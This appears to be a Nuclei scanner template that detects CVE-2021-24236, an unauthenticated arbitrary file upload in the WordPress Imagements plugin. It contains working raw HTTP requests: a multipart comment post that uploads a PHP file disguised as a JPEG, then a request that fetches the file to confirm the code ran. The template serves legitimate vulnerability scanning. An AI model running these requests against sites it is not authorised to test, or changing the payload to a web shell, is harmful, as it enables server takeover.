id: "CVE-2021-24236"

info:
  name: WordPress Imagements <=1.2.5 - Arbitrary File Upload
  author: pussycat0x
  severity: critical
  description: |
    WordPress Imagements plugin through 1.2.5 is susceptible to arbitrary file upload which can lead to remote code execution. The plugin allows images to be uploaded in comments but only checks for the Content-Type in the request to forbid dangerous files. An attacker can upload arbitrary files by using a valid image Content-Type along with a PHP filename and code.
  remediation: |
    Update WordPress Imagements plugin to version 1.2.6 or later to fix the arbitrary file upload vulnerability.
  reference:
    - https://wpscan.com/vulnerability/8f24e74f-60e3-4100-9ab2-ec31b9c9cdea
    - https://wordpress.org/plugins/imagements/
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24236
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24236
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: "CVE-2021-24236"
    cwe-id: CWE-434
    epss-score: 0.14539
    epss-percentile: 0.952
    cpe: cpe:2.3:a:imagements_project:imagements:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: imagements_project
    product: imagements
    framework: wordpress
  tags: cve,wp,unauth,imagements,wpscan,cve2021,fileupload,wordpress,wp-plugin,intrusive
variables:
  php: "{{to_lower('{{randstr}}')}}.php"
  post: "1"

http:
  - raw:
      - |
        POST /wp-comments-post.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIYl2Oz8ptq5OMtbU

        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="comment"

        {{randstr}}
        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="author"

        {{randstr}}
        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="email"

        {{randstr}}@email.com
        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="url"

        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="checkbox"


        yes
        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="naam"

        {{randstr}}
        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="image"; filename="{{php}}"
        Content-Type: image/jpeg

        <?php echo 'CVE-2021-24236'; ?>

        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="submit"

        Post Comment
        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="comment_post_ID"

        {{post}}
        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="comment_parent"

        0
        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU--
      - |
        GET /wp-content/plugins/imagements/images/{{php}} HTTP/1.1
        Host: {{Hostname}}

    req-condition: true
    matchers:
      - type: word
        part: body_2
        words:
          - "CVE-2021-24236"
# digest: 490a0046304402201534a020dbaf5d6b2bf6535293ec5ea4c5e462781a2e19a80ce5c6e527ecd37902202188e9e92a67950b753075827d9bd1d424a5be9c6bfdb4bf610b7ec451915d8c:922c64590222798bb761d5b6d8e72950